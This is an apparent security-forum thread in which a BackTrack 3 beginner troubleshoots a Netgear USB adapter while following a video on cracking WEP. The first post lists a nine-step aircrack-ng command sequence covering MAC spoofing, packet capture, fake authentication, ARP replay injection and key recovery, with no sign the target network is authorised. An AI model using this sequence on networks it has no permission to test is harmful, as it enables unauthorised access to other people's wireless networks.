Results 1 to 3 of 3

Thread: wireless card help

  1. #1
    Just burned his ISO
    Join Date
    Jul 2008

    Question wireless card help

    I'm pretty new with BT3, but I have been slowly doing trial and errors, by reading these forums and watching youtube videos of cracking wep. In my excitement I didn't even bother to check if my USB doggle worked. Being smart now after a frustrating 7+ hours of trying to crack I decided to find out if my USB is compatable.
    I checked the compatibility list and I am running a Netgear WG111V2 chipset RTL8187 Driver r8187
    My laptop hp pavillion 6700t has a Intel 4965 chipset
    Backtrack 3 Final

    What I've done
    -When I inserted the netgear usb, no lights come on.
    -When I go to wireless Assistant it can't detect any networks unless I manually turn on the wireless switch on my laptop to be on. so both detect, but still no lights
    -Researched mac80211 versus ieee80211 so I do iwconfig
    I get
    lo no wireless extensions
    eth0 no wireless extensions
    wmaster0 no wireless extensions
    wlan0 IEEE 802.11g... mode:managed...
    Wlan1 802.11 Mode monitored

    -Type in airmon-ng stop wlan0, but when i type iwconfig its still shows up, doesn't disable it
    Is there any conflict between my intel and my netgear?
    BTW this is the youtube video (-xx) hxxp://
    the guy uses the same one as me... lmao I'd thought it would work out of box. But I guess there are too many problems with this. (Its a shame I bought 3)

    The reason being when I follow his codes:
    1)airmon-ng stop wlan0
    2)ifconfig wlan0 down
    3)macchanger --mac 00:11:22:33:44:55 wlan0
    4)airmon-ng start wlan0
    5)airodump-ng wlan0
    6)airodump-ng -c (channel) -w (file name) --bssid (bssid) wlan0
    7)aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 wlan0
    8)aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 wlan0
    9)aircrack-ng -b (bssid) (filename-01.cap)
    After I type in the 7th step I get
    Sending Authentication Request (open system)
    Attack was unsuccessful.Possible reasons...
    Is -h suppose to be 00:11:22:33:44:55 or is it suppose to be target client mac?
    Thanks a lot! yea its a lot of info, just trying to be as specific as possible.

  2. #2
    Just burned his ISO
    Join Date
    Jul 2008


    No help?

  3. #3
    Join Date
    Mar 2007


    This is a fairly simply subject and there are lots of tutorials here and on the aircrack-ng site to help you out.

    EDIT: what the hell you caught me in a good mood.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts